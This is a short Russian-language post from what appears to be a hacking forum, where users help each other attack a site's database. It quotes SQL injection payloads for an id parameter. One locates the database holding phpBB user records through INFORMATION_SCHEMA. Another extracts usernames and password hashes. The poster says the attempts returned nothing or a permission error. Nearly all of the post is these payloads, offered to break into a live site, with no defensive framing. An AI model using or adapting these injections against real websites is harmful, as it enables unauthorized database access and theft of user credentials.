22.03.2008, 18:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Сообщение от Scipio
phpbb_users в другой бд
id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*
то что получится и будет бд, потом:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+БД.phpbb_users+limit+1,1/*
возвращает в первом запросе пустоту.
+ если беру на угад например:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+forum.phpbb_users/*
возвращает
SELECT command denied to user sdf'@'localhost' for table 'phpbb_users'
__________________
BlackHat. MoDL
|
|
|